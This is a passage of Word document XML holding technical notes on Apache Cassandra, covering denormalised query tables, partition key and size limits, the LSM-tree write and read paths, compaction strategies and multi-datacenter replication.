    <w:p w14:paraId="2CDF6163" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Query 3: "Get order details by order_id"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A7CFF6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">    → Table: orders_by_id (partition: order_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E1BE4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3F4E50B6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Result: Same data in 3 tables (denormalized), each optimized for one query pattern.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7B2D8F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why denormalization is necessary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F9FD1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2D8BC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Cassandra can ONLY efficiently query by:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51718CE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  1. Partition key (equality) — mandatory for every query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C371CEA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Clustering key (range/equality) — optional, must follow order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="395CE9D1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="3C82C23B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Efficient:   WHERE customer_id = ? AND order_date &gt; ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6219F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Inefficient: WHERE total &gt; 100 (requires full cluster scan — NEVER do this in production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718AEBF9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Partition Size Limits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="798BA82A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF4512" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Recommendations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC9C072" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Max partition size: 100 MB (hard to repair, slow reads beyond this)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE8A776" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Max rows per partition: 100,000 (practical limit for performance)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6D2FBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76CD1F47" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Problem: time-series with unbounded growth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3635DAC8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  BAD:  PRIMARY KEY ((device_id), timestamp)  → grows forever as time passes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B170B63" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  GOOD: PRIMARY KEY ((device_id, day_bucket), timestamp)  → bounded (one partition per day)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1CC1E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Cassandra Storage Engine (LSM-Tree)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4047E588" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Write Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213D5CBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B7954" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Client → Coordinator Node → Replica Nodes (based on consistency level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0A6DF9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7A29B6DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>On each replica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D58E1C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Write to Commit Log (append-only file — durability, like WAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D955B2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Write to Memtable (in-memory sorted structure — red-black tree / skip list)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB96A6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. Return ACK to coordinator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D34AC7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="38CA2FE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  (Asynchronously:)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C4107" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  4. When memtable is full → flush to SSTable on disk (immutable, sorted file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68778567" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  5. Background compaction merges SSTables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C45B4C8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="293539DE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write is complete after steps 1+2 → FAST (sequential log + memory write only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F9D1FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>No read-before-write. No locking. No updating in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF9B6AA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Read Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E19D5B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5E80CD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Client → Coordinator → Replica(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77802305" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="09CC5BE6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>On each replica:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FEE3B60" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Check Bloom filter: "Could this partition key be in this SSTable?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7168D43F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     → NO: skip this SSTable entirely (saves a disk read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3772F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     → MAYBE: continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6320417B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="677CEBBD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Check partition key cache: is the partition's location cached?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6CAC9E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     → YES: jump directly to data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A270602" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     → NO: check partition index → find offset on disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761E680B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="078A6EBA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. Check row cache (if enabled): is the actual row cached?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C68B71" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     → YES: return immediately</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE05EE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">     → NO: read from SSTable on disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA53FCC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="578D4F52" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  4. Merge results from Memtable + multiple SSTables (reconcile timestamps)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6328F14D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  5. Return most recent value (latest timestamp wins)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BE021F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why reads are slower than writes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78642F5B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Must check multiple SSTables (data may be spread across many).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3679BCEE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Bloom filter reduces but doesn't eliminate unnecessary reads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7751CE80" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Merge/reconciliation has CPU cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186BEEC0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1581"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Compaction helps (fewer SSTables to check) but has I/O cost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB3051A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Compaction Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D7AFFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A86FBA4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Size-Tiered Compaction (STCS) — default:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477072AF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Group SSTables of similar size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEC6E94" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - When N SSTables of similar size exist → merge into one larger SSTable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5AF6C9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Good for write-heavy workloads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BA60BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Downside: temporary 50-100% space amplification during compaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211E769A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="28B8A520" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Leveled Compaction (LCS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3726C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - SSTables organized into levels (L0, L1, L2...).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F69831B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Each level is 10x larger than previous.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD795E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - SSTables at each level don't overlap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129E7266" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Good for read-heavy workloads (fewer SSTables to check per read).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63975E5D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Downside: higher write amplification.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410BEF2D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="01E35F94" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Time-Window Compaction (TWCS) — for time-series:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD65629" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Groups SSTables by time window (e.g., 1 hour).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BB40882" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Only compacts within same time window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B75B1B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Old windows are never compacted (immutable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292ED6FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Perfect for time-series (old data never changes, can be dropped by window).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FA0932" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Cassandra Multi-Datacenter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073F6483" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FFA28C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────┐              ┌─────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0BAE19" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>│   DC: us-east   │              │   DC: eu-west   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A22DBBB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│                 │              │                 │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56548F4A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  Node A  Node B │</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>◄</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>►</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Node D  Node E </w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0509FB7A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  Node C         │  async repl  │  Node F         │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0138E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  RF: 3          │              │  RF: 3          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F00D78" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────────────────┘              └─────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C4186A5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="18D71773" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write with LOCAL_QUORUM:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAB5067" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - 2/3 nodes in LOCAL DC acknowledge → success returned to client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D3826AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Replication to remote DC happens asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E30C1F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Low write latency (no cross-region wait).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8D277F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Remote DC eventually consistent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25311106" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. When to Use Cassandra</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549"/>
        <w:gridCol w:w="4801"/>
      </w:tblGrid>
